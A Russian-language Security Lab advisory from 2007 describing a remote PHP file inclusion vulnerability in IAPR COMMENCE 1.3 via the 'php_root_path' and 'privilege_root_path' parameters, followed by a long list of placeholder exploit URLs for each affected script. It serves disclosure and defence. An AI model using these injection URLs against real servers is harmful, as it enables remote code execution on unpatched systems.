Security Lab

PHP-инклюдинг в IAPR COMMENCE

Дата публикации:26.11.2007
Дата изменения:29.11.2007
Всего просмотров:3123
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: IAPR COMMENCE 1.x
Уязвимые версии: IAPR COMMENCE 1.3, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметрах "php_root_path" и "privilege_root_path" в различных сценариях. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Примеры:

http://[host]/Commence/includes/db_connect.php?php_root_path=[file]
http://[host]/Commence/includes/include_all_fns.php?php_root_path=[file]
http://[host]/Commence/includes/main_fns.php?php_root_path=[file]
http://[host]/Commence/includes/output_fns.php?php_root_path=[file]
http://[host]/Commence/includes/user_authen_fns.php?php_root_path=[file]
http://[host]/Commence/admin/includes/include_all_fns.php?php_root_path=[file]
http://[host]/Commence/admin/phase/include_all_phase.php?php_root_path=[file]
http://[host]/Commence/admin/phase/phase1.php?php_root_path=[file]
http://[host]/Commence/admin/phase/phase1.php?privilege_root_path=[file]
http://[host]/Commence/admin/phase/phase2.php?php_root_path=[file]
http://[host]/Commence/admin/phase/phase2.php?privilege_root_path=[file]
http://[host]/Commence/admin/phase/phase3.php?php_root_path=[file]
http://[host]/Commence/admin/phase/phase3.php?privilege_root_path=[file]
http://[host]/Commence/admin/phase/phase4.php?php_root_path=[file]
http://[host]/Commence/admin/phase/phase4.php?privilege_root_path=[
http://[host]/Commence/admin/phase/phasebase.php?php_root_path=[file]
http://[host]/Commence/includes/page_includes/page.php?php_root_path=[file]
http://[host]/Commence/includes/page_includes/pagebase.php?php_root_path=[file]
http://[host]/Commence/reviewer/includes/include_all_fns.php?php_root_path=[file]
http://[host]/Commence/reviewer/phase/include_all_phase.php?php_root_path=[file]
http://[host]/Commence/includes/page_includes/pagebase.php?php_root_path=[file]
http://[host]/Commence/reviewer/phase/phase1.php?php_root_path=[file]
http://[host]/Commence/reviewer/phase/phase1.php?privilege_root_path=[file]
http://[host]/Commence/reviewer/phase/phase2.php?php_root_path=[file]
http://[host]/Commence/reviewer/phase/phase2.php?privilege_root_path=[file]
http://[host]/Commence/reviewer/phase/phase3.php?php_root_path=[file]
http://[host]/Commence/reviewer/phase/phase3.php?privilege_root_path=[file]
http://[host]/Commence/reviewer/phase/phase4.php?php_root_path=[file]
http://[host]/Commence/reviewer/phase/phase4.php?privilege_root_path=[file]
http://[host]/Commence/reviewer/phase/phasebase.php?php_root_path=[file]
http://[host]/Commence/user/phase/include_all_phase.php?php_root_path=[file]
http://[host]/Commence/user/phase/phase1.php?php_root_path=[file]
http://[host]/Commence/user/phase/phase2.php?php_root_path=[file]
http://[host]/Commence/user/phase/phase3.php?php_root_path=[file]
http://[host]/Commence/user/phase/phase4.php?php_root_path=[file]
http://[host]/Commence/user/phase/phasebase.php?php_root_path=[file]

URL производителя: iaprcommence.sourceforge.net

Решение: Способов устранения уязвимости не существует в настоящее время.